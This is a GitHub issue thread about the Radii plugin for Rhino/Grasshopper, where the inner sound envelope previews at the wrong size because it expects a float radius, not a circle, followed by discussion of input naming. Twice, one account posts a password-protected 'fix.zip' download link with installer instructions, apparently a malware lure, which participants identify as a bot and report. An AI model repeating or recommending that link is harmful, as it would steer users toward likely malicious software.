### ISSUE TITLE
v40 Publish sound inner envelope

### ISSUE THREAD

**Issue by gesievi** [Archtica/Radii#152]
![grafik](https://github.com/user-attachments/assets/f8ac29d7-f78b-49d9-bd47-b0766b5ced42)

The Inner envelope is only previewed as smaller at around 1.4 for the radius input. Then it starts to appear as a preview in the way shown in the picture below.
The dark green is the corresponding circle to the selected grasshopper component that i am inputting. See the light sphere that is previewed in rhino, it should be the size of the circle. Ill now test if the sound is behaving in the same way.

![grafik](https://github.com/user-attachments/assets/2233f740-433b-4c03-8b0d-213bb8a71f12)

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gesievi** [comment]
This seems like a bot reply.

> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Archtica** [comment]
Good find, I get that too with the two circles. I'll have a look.
Yes, there are alot of bots. I don't know how to prevent that in github without closing commenting.

**Comment by gesievi** [comment]
I reported the bot already with github.

**Comment by Archtica** [comment]
Thanks
I see why you are getting the error. The inner envelope just takes a float value as radius, not a circle. It's only the outer that takes a circle.

**Comment by gesievi** [comment]
ah interesting, would a rectangular sound barrier also be possible ?

**Comment by gesievi** [comment]
then we could feed any brep as boundary ? i am thinking about most spaces that are not sperical. we have not tested this in bigger scales but i am assuming with spheres in houses will have some overlapping between the floors.

**Comment by Archtica** [comment]
No, only circle unfortunately. I did thinks about allowing any shapes but it takes much more calculation in the viewer rather than just distance to a point.

**Comment by Archtica** [comment]
Somehow a circle translate weirdly to float. Can you figure out why that value?
Never the less. The inner should only be a float.
![image](https://github.com/user-attachments/assets/1deed23c-ae4d-41f2-8700-fb2199ee52a2)

**Comment by gesievi** [comment]
yes that is the length of the circle.
Using a circle twice would make a lot of sense, otherwise maybe we could indicate in the name of the inner env, that it just needs the inner diameter since it is going to use the same plane.

**Comment by gesievi** [comment]
How about "rad inner env." as a name. Then its clear that a circle is not deeded.
the other one could be called "outer envelope circle. That way you only have to change the naming convention in this case.

**Comment by Archtica** [comment]
When you roll over the input you get what is needed. I don't want to make the naming too long, but right now they are too close to each other.
